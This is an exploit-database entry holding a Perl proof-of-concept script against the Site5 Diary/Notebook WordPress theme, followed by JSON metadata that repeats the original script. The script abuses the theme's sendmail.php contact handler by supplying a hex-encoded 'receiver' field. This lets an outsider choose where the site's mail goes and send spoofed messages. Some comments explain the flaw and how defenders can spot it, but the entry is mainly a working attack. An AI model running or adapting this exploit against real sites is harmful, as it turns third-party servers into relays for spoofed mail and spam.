ID 1337DAY-ID-18996 Type zdt Reporter bwall Modified 2012-07-16T00:00:00
Description
Exploit for php platform in category web applications
#!/usr/bin/perl
# Exploit Title: Diary/Notebook Site5 Wordpress Theme - Email Spoofing
# Date: 15.07.2012
# Exploit Author: @bwallHatesTwits
# Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)
# Software Link: http://www.wpdiarytheme.com/
# Vendor Homepage: http://www.site5.com/
# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/
# Version: Not Documented
# Tested on: Linux 3.2
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common qw{ POST };
# What this proof of concept demonstrates: the Diary theme's contact-form
# handler (sendmail.php) is sent a `receiver` field chosen by the client, so
# the destination of the mail is not fixed by the site. The handler's source is
# not part of this listing; presumably it decodes the hex string and mails to
# the result, which is what the "Email Spoofing" title refers to.
# For defenders: the recipient belongs in server-side configuration and a
# client-supplied `receiver` should be ignored; the requests to watch for are
# POSTs to this path that carry a `receiver` form field.

# Root URL of the WordPress install under test (default: a local instance).
my $site_root = 'http://localhost/wordpress/';
my $endpoint  = $site_root . 'wp-content/themes/diary/sendmail.php';

# Appears in the subject of the resulting mail
# ("Website contact message from <name>").
my $sender_name = 'Proof of Concept';

# Address the message claims to come from. The literal is the hosting page's
# email-protection placeholder, not a usable address.
my $sender_address = '[email protected]';

# Body text of the message.
my $message_body = 'Email content';

# Destination address (same placeholder caveat as the sender address).
my $recipient = '[email protected]';

# The form carries the recipient as hex: each character matched by `.`
# (so not a newline) becomes the unpadded lowercase hex of its ordinal.
(my $recipient_hex = $recipient) =~ s{(.)}{ sprintf '%x', ord $1 }ge;

# Form fields in the order they are submitted.
my @form_fields = (
    name     => $sender_name,
    email    => $sender_address,
    comment  => $message_body,
    receiver => $recipient_hex,
    submit   => 'submit',
);

my $ua      = LWP::UserAgent->new();
my $request = POST( $endpoint, \@form_fields );

print "Sending request to $endpoint\n";

# Send the POST and dump the full response (status line, headers, body) so
# the handler's reply can be inspected.
my $response = $ua->request($request);
print $response->as_string();

print "\nDone\nFollow \@BallastSec on Twitter\n";
{"published": "2012-07-16T00:00:00", "id": "1337DAY-ID-18996", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-04-06T01:48:10", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/BINOM3_LOGIN_CONFIG_PASS_DUMP", "MSF:AUXILIARY/SCANNER/HTTP/GIT_SCANNER", "MSF:AUXILIARY/SCANNER/HTTP/SYMANTEC_WEB_GATEWAY_LOGIN", "MSF:EXPLOIT/MULTI/HTTP/EATON_NSM_CODE_EXEC", "MSF:AUXILIARY/SCANNER/HTTP/CRAWLER", "MSF:EXPLOIT/MULTI/HTTP/QDPM_UPLOAD_EXEC", "MSF:EXPLOIT/MULTI/HTTP/PHP_VOLUNTEER_UPLOAD_EXEC", "MSF:EXPLOIT/WINDOWS/HTTP/EZSERVER_HTTP"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18996", "SECURITYVULNS:VULN:8627"]}], "modified": "2018-04-06T01:48:10", "rev": 2}, "vulnersScore": 0.2}, "type": "zdt", "lastseen": "2018-04-06T01:48:10", "edition": 2, "title": "Wordpress Diary/Notebook Site5 Theme Email Spoofing", "href": "https://0day.today/exploit/description/18996", "modified": "2012-07-16T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/18996", "references": [], "reporter": "bwall", "sourceData": "#!/usr/bin/perl\r\n# Exploit Title: Diary/Notebook Site5 Wordpress Theme - Email Spoofing\r\n# Date: 15.07.2012\r\n# Exploit Author: @bwallHatesTwits\r\n# Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)\r\n# Software Link: http://www.wpdiarytheme.com/\r\n# Vendor Homepage: http://www.site5.com/\r\n# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/\r\n# Version: Not Documented\r\n# Tested on: Linux 3.2\r\nuse strict;\r\nuse warnings;\r\n \r\nuse LWP::UserAgent;\r\nuse HTTP::Request::Common qw{ POST };\r\n \r\n#Change this to the root of the Wordpress\r\nmy $wordpress = 'http://localhost/wordpress/';\r\nmy $url = 
$wordpress.'wp-content/themes/diary/sendmail.php';\r\n \r\n#Name shows up in the topic of the email (Website contact message from name)\r\nmy $name ='Proof of Concept';\r\n \r\n#Sender email address\r\nmy $email = '[email\u00a0protected]';\r\n \r\n#Content of the email\r\nmy $comment = 'Email content';\r\n \r\n#Receiver email address\r\nmy $receiver = '[email\u00a0protected]';\r\n$receiver =~ s/(.)/sprintf(\"%x\",ord($1))/eg;\r\n \r\nmy $ua = LWP::UserAgent->new();\r\nmy $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );\r\nprint \"Sending request to $url\\n\";\r\nmy $content = $ua->request($request)->as_string();\r\nprint $content;\r\nprint \"\\nDone\\nFollow \\@BallastSec on Twitter\\n\";\r\n\r\n\n\n# 0day.today [2018-04-06] #"}